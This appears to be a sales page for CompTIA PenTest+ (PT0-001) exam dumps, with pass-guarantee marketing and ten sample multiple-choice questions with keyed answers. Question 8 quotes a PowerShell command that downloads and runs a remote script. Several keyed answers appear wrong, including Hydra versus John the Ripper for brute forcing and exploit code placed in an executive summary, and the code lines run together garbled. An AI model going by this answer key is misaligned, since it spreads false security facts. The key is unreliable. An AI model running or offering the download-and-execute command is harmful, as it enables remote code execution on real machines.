CompTIA PT0-001 Exam Dumps PDF

CompTIA PenTest+ Exam

Total Questions: 294
Update Date: June 05, 2024

PDF + Test Engine $65
Test Engine $55
PDF $45

  • Last Update on June 05, 2024
  • 100% Passing Guarantee of PT0-001 Exam
  • 90 Days Free Updates of PT0-001 Exam
  • Full Money Back Guarantee on PT0-001 Exam

DumpsFactory is forever best for your CompTIA PT0-001 exam preparation.

For your best practice we are providing you free questions with valid answers for the exam of CompTIA, to practice for this material you just need sign up to our website for a free account. A large bundle of customers all over the world is getting advantages by our CompTIA PT0-001 dumps. We are providing 100% passing guarantee for your PT0-001 that you will get more high grades by using our material which is prepared by our most distinguish and most experts team.

Most regarded plan to pass your CompTIA PT0-001 exam:

We have hired most extraordinary and most familiar experts in this field, who are so talented in preparing the material, that there prepared material can succeed you in getting the high grades in CompTIA PT0-001 exams in one day. That is why DumpsFactory available for your assistance 24/7.

Easily accessible for mobile user:

Mobile users can easily get updates and can download the CompTIA PT0-001 material in PDF format after purchasing our material and can study it any time in their busy life when they have desire to study.

Get Pronto CompTIA PT0-001 Questions and Answers

By using our material you can succeed in CompTIA PT0-001 exam in your first attempt because we update our material regularly for new questions and answers for CompTIA PT0-001 exam.

Notorious and experts present CompTIA PT0-001 Dumps PDF

Our most extraordinary experts are too much familiar and experienced with the behaviour of CompTIA Exams that they prepared such beneficial material for our users.

Guarantee for Your Investment

DumpsFactory wants that their customers increased more rapidly, so we are providing to our customer with the most demanded and updated questions to pass CompTIA PT0-001 Exam. You can claim for your investment by using our money back policy if you have not been availed with our promised facilities for the CompTIA exams. For details visit to Refund Contract.

Question 1

When negotiating a penetration testing contract with a prospective client, which of thefollowing disclaimersshould be included in order to mitigate liability in case of a future breach of the client’ssystems?

A. The proposed mitigations and remediations in the final report do not include a costbenefit analysis. 
B. The NDA protects the consulting firm from future liabilities in the event of a breach. 
C. The assessment reviewed the cyber key terrain and most critical assets of the client’snetwork. 
D. The penetration test is based on the state of the system and its configuration at the timeof assessment. 

Answer: D

Question 2

Which of the following tools would a penetration tester leverage to conduct OSINT? (SelectTWO).

A. Shodan 
B. SET 
C. BeEF 
D. Wireshark 
E. Maltego 
F. Dynamo 

Answer: A,E

Question 3

Which of the following tools is used to perform a credential brute force attack?

A. Hydra 
B. John the Ripper 
C. Hashcat 
D. Peach 

Answer: B

Question 4

A penetration tester used an ASP.NET web shell to gain access to a web application,which allowed the testerto pivot in the corporate network. Which of the following is the MOST important follow-upactivity to completeafter the tester delivers the report?

A. Removing shells 
B. Obtaining client acceptance 
C. Removing tester-created credentials 
D. Documenting lessons learned 
E. Presenting attestation of findings 

Answer: E

Question 5

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSSvulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

A. 2.9 
B. 3.0 
C. 4.0 
D. 5.9 

Answer: C

Question 6

During a physical security review, a detailed penetration testing report was obtained, whichwas issued to asecurity analyst and then discarded in the trash. The report contains validated critical riskexposures. Which ofthe following processes would BEST protect this information from being disclosed in thefuture?

A. Restrict access to physical copies to authorized personnel only. 
B. Ensure corporate policies include guidance on the proper handling of sensitiveinformation. 
C. Require only electronic copies of all documents to be maintained. 
D. Install surveillance cameras near all garbage disposal areas. 

Answer: B

Question 7

A penetration tester needs to provide the code used to exploit a DNS server in the finalreport. In which of thefollowing parts of the report should the penetration tester place the code?

A. Executive summary 
B. Remediation 
C. Conclusion 
D. Technical summary 

Answer: A

Question 8

Consider the following PowerShell command:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-CmdletWhich of the following BEST describes the actions performed this command?

A. Set the execution policy 
B. Execute a remote script 
C. Run an encoded command 
D. Instantiate an object 

Answer: B

Question 9

Given the following Python script:#1/usr/bin/pythonimport socket as sktfor port in range (1,1024):try:sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)sox.settimeout(1000)sox.connect ((‘127.0.0.1’, port))print ‘%d:OPEN’ % (port)sox.closeexcept: continueWhich of the following is where the output will go?

A. To the screen 
B. To a network server 
C. To a file 
D. To /dev/null 

Answer: A

Question 10

A penetration tester has gained physical access to a facility and connected directly into theinternal network.The penetration tester now wants to pivot into the server VLAN. Which of the followingwould accomplish this?

A. Spoofing a printer’s MAC address 
B. Abusing DTP negotiation 
C. Performing LLMNR poisoning 
D. Conducting an STP attack 

Answer: D